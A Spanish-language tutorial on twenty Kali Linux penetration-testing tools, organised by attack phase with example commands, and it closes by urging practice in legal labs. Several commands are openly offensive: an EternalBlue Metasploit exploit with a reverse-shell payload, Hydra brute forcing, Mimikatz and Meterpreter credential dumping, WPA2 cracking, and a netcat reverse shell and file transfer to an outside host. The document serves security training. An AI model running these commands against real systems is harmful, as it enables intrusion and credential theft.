¿Por qué Kali Linux?
Kali Linux es la distribución de referencia para seguridad ofensiva. Viene preinstalada con más de 600 herramientas organizadas por categorías. Aquí están las 20 más importantes para un pentest profesional.
Fase 1: Reconocimiento
1. Nmap — Escaneo de redes
# Escaneo completo
sudo nmap -sV -sC -O -p- 192.168.1.1 -oA resultado
2. theHarvester — OSINT de dominios
# Recopilar emails, subdominios, IPs
theHarvester -d empresa.com -b all -l 500
3. Maltego — Visualización de relaciones
Herramienta gráfica para mapear relaciones entre entidades (dominios, IPs, personas, organizaciones). Ideal para OSINT avanzado.
4. Shodan CLI — Internet de las cosas expuesto
# Instalar
pip install shodan
# Buscar dispositivos vulnerables (solo con API key)
shodan search "apache 2.4.49" --fields ip_str,port,org
Fase 2: Escaneo de vulnerabilidades
5. Nikto — Escáner web
# Escaneo básico de servidor web
nikto -h https://target.com
# Con autenticación
nikto -h https://target.com -id usuario:password
6. OpenVAS / GVM — Escáner de vulnerabilidades
# Iniciar servicio
sudo gvm-start
# Acceder vía web: https://127.0.0.1:9392
7. Gobuster — Descubrimiento de directorios
# Fuerza bruta de directorios
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
# Subdominios
gobuster dns -d target.com -w /usr/share/wordlists/dns.txt
Fase 3: Explotación
8. Metasploit Framework
# Iniciar consola
msfconsole
# Buscar exploit
msf6 > search eternalblue
# Usar un módulo
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit > set RHOSTS 192.168.1.100
msf6 exploit > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit > set LHOST 192.168.1.50
msf6 exploit > run
9. SQLMap — Inyección SQL automatizada
sqlmap -u "https://target.com/?id=1" --dbs --batch
10. Hydra — Fuerza bruta de credenciales
# SSH
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# HTTP login form
hydra -l admin -P rockyou.txt 192.168.1.1 http-post-form \
"/login:user=^USER^&pass=^PASS^:Invalid credentials"
11. John the Ripper — Cracking de hashes
# Crackear hash NTLM
echo "hash_ntlm" > hash.txt
john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Mostrar resultados
john --show hash.txt
12. Hashcat — GPU cracking
# MD5 con diccionario
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
# SHA-256 con reglas
hashcat -m 1400 hash.txt rockyou.txt -r rules/best64.rule
Fase 4: Post-explotación
13. Meterpreter (Metasploit)
# Una vez con sesión abierta
meterpreter > sysinfo
meterpreter > getuid
meterpreter > hashdump # Extraer hashes
meterpreter > screenshot # Captura de pantalla
meterpreter > download archivo # Descargar archivo
meterpreter > shell # Shell del sistema
14. Mimikatz — Extracción de credenciales Windows
# En shell de Windows comprometido
privilege::debug
sekurlsa::logonpasswords # Credenciales en memoria
lsadump::sam # Hashes SAM
Fase 5: Análisis web
15. Burp Suite — Proxy de intercepción web
La herramienta más importante para pentesting web:
- Intercepta y modifica requests HTTP/S
- Scanner de vulnerabilidades (Pro)
- Repeater para pruebas manuales
- Intruder para fuerza bruta
# Iniciar Burp Suite Community
burpsuite &
16. OWASP ZAP — Alternativa gratuita a Burp
zaproxy &
# O modo línea de comandos
zap-cli quick-scan -s all https://target.com
17. WPScan — WordPress específico
# Enumerar usuarios y plugins
wpscan --url https://target.com --enumerate u,p,t
# Con API key para vulnerabilidades
wpscan --url https://target.com --api-token TU_TOKEN
Fase 6: Análisis de red
18. Wireshark — Análisis de paquetes
# Captura en interfaz eth0
sudo wireshark &
# Filtros útiles:
# http.request.method == "POST" → Ver forms
# tcp.port == 443 → HTTPS
# dns → Consultas DNS
19. Aircrack-ng — WiFi
# Poner en modo monitor
sudo airmon-ng start wlan0
# Capturar handshakes
sudo airodump-ng wlan0mon
# Crackear WPA2
aircrack-ng -w rockyou.txt captura.cap
20. Netcat — La navaja suiza de redes
# Listener (recibir conexión)
nc -lvnp 4444
# Shell reversa (en víctima)
nc 192.168.1.50 4444 -e /bin/bash
# Transferir archivos
# Receptor:
nc -lvnp 4444 > archivo.txt
# Emisor:
nc 192.168.1.50 4444 < archivo.txt
Resumen por fase
| Fase | Herramientas clave |
|---|---|
| Reconocimiento | Nmap, theHarvester, Shodan |
| Escaneo | Nikto, Gobuster, OpenVAS |
| Explotación | Metasploit, SQLMap, Hydra |
| Post-explotación | Meterpreter, Mimikatz |
| Web | Burp Suite, ZAP, WPScan |
| Red | Wireshark, Aircrack-ng, Netcat |
Conclusión
Kali Linux es un ecosistema completo para seguridad ofensiva. La clave no está en conocer todas las herramientas, sino en entender cuándo y cómo usar cada una dentro de una metodología estructurada. Practica siempre en entornos legales como HackTheBox o TryHackMe.